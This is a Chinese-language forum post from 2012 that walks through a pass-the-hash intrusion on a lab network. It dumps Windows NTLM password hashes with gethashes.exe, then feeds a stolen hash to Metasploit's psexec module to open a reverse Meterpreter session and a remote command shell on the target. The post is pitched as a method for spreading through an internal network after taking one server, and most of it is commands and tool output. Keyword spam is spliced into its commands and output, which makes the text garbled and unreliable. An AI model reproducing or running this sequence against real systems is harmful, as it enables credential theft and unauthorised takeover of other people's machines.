设为首页收藏本站
开启辅助访问 切换到宽版
搜索
传奇GM论坛»论坛 精品版本 微端版本 使用hash直接登陆windows

使用hash直接登陆windows

[复制链接]
查看299 | 回复0 | 2012-4-1 19:21:37 | 显示全部楼层 |阅读模式
现在的网络管理员渗透中,如果我们拿到了管理员的HASH,缺怎奈硬盘小、带宽低、配置烂,无法成功破解出来,怎么办呢?
直接发过程了...网上关于HASH传递攻击的文章较多,就不说了。这里演示的一个情况特别适用于内网渗透,当我们获得一台服务器的管理权限后,继续渗透内网其他服务器.

必不可少的都会先获取到本服务器的管理员密码再用来尝试目标服务器,可是当破解不出的时候怎么办?我们就可以采用HASH传递攻击.直接使用HASH登陆目标主机,因为我们知道电脑本身需要的就是我们提供一份合法的具有权限的HASH,那些复杂的数学运算、加密,咱才不会咧~

废话不扯,演示开始,首先,我在我的PC(假设为目标主机)

新建一个isosky用户,并为之设置密码,然后通过各类软件获取到HASH


C:\>netuserisoskytest

Thecommandcompletedsucces单机传奇ully.


C:\>gethashes.exe$local

1:1007:C2265B23734E0DACAAD3B435B51404EE:69943C5E63B4D2C104DBBCC15138B72B:::

Administrator:500:0A174C1272FCBCF7804E0502081BA8AE:83F36A86631180CB9F5F53F5F45DF

B2B:::

Guest:501:AAD3B435B51404EEAAD3B435B51404EE:31D6CFE0D16AE931B73C59D7E0C089C0:::

HelpAssistant:1000:CF88594C2AC20629EEF3D6DABD2DA92D:0FCE98570CBB9C14E8FF200353B2

707B:::

isosky:1003:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537:::
SUPPORT_388945a0:1002:AAD3B435B51404EEAAD3B435B51404EE:F9E8AE6C7229EA07EFAC12715

F954B83:::

__vmware_user__:1006:AAD3B435B51404EEAAD3B435B51404EE:915D1CEE456EA4DD6A8094F7CE

094448:::
C:\>
然后我再返回我的BT虚拟机(攻击者主机)使用M游戏进行测试,M游戏自带的PSEXEC模块具有HASH传递攻击功能
root@bt:~#m单机传奇console
#########

########################################

################################

######################################

##############################

######################################

##


=[metasploitv3.7.0-release[core:3.7api:1.0]

+----=[684exploits-355auxiliary

+----=[217payloads-27encoders-8nops

=[svnr12536updated76daysago(2011.05.04)
Warning:ThiscopyoftheMetasploitFrameworkwaslastupdated76daysago.

Werecommendthatyouupdatetheframeworkatleasteveryotherday.

ForinformationonupdatingyourcopyofMetasploit,pleasesee:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating
m单机传奇>useexploit/windows/smb/psexec

m单机传奇exploit(psexec)>showoptions
Moduleoptions(exploit/windows/smb/psexec):
NameCurrentSettingRequiredDescription

--------------------------------------

RHOSTyesThetargetaddress

RPORT445yesSettheSMBserviceport

SHAREADMIN$yesThesharetoconnectto,canbeanadminshare
(ADMIN$,C$,...)oranormalread/writefoldershare

SMBDomainWORKGROUPnoTheWindowsdomaintouseforauthentication

SMBPassnoThepasswordforthespecifiedusername

SMBUsernoTheusernametoauthenticateas


Exploittarget:
IdName

------

0Automatic


m单机传奇exploit(psexec)>setRHOST192.168.0.254

RHOST=>192.168.0.254

m单机传奇exploit(psexec)>setSMBUserisosky

SMBUser=>isosky

m单机传奇exploit(psexec)>setSMBPass01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537
SMBPass=>01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537

m单机传奇exploit(psexec)>showoptions
Moduleoptions(exploit/windows/smb/psexec):
NameCurrentSettingRequired
Description

--------------------------------
------

RHOST192.168.0.254yesThe
targetaddress

RPORT445yesSet
theSMBserviceport

SHAREADMIN$yesThe
sharetoconnectto,canbeanadminshare(ADMIN$,C$,...)oranormalread/writefoldershare

SMBDomainWORKGROUPnoThe
Windowsdomaintouseforauthentication

SMBPass01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B89537noThe
passwordforthespecifiedusername

SMBUserisoskynoThe
usernametoauthenticateas


Exploittarget:
IdName

------

0Automatic


m单机传奇exploit(psexec)>exploit
[*]Startedreversehandleron192.168.0.3:4444

[*]Connectingtotheserver...

[*]Authenticatingto192.168.0.254:445|WORKGROUPasuser'isosky'...

[*]Uploadingpayload...

[*]Created\UGdecsam.exe...

[*]Bindingto367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl]...

[*]Boundto367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.0.254[\svcctl]...

[*]Obtainingaservicemanagerhandle...

[*]Creatinganewservice(MZsCnzjn-"MrZdoQwIlbBIYZQJyumxYX")...

[*]Closingservicehandle...

[*]Openingservice...

[*]Startingtheservice...

[*]Removingtheservice...

[*]Closingservicehandle...

[*]Deleting\UGdecsam.exe...

[*]Sendingstage(749056bytes)to192.168.0.254

[*]Meterpretersession1opened(192.168.0.3:4444->192.168.0.254:1877)at2011-07-1903:57:17+0800
meterpreter>sysinfo

Computer:ISOSKY-PC

OS:WindowsXP(Build2600,ServicePack2).

Architecture:x86

SystemLanguage:zh_CN

Meterpreter:x86/win32

meterpreter>shell

Process4596created.

Channel1created.

MicrosoftWindowsXP[Version5.1.2600]

(C)Copyright1985-2001MicrosoftCorp.
C:\WINDOWS\system32>netuser

netuser
Useraccount单机传奇or\\
-------------------------------------------------------------------------------

__vmware_user__1Administrator

GuestHelpAssistantisosky

SUPPORT_388945a0

Thecommandcompletedwithoneormoreerrors.


C:\WINDOWS\system32>
至此,我们已经成功获得目标的CMDSHELL是不是非常简单?

 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

沙城主
回复楼主 返回列表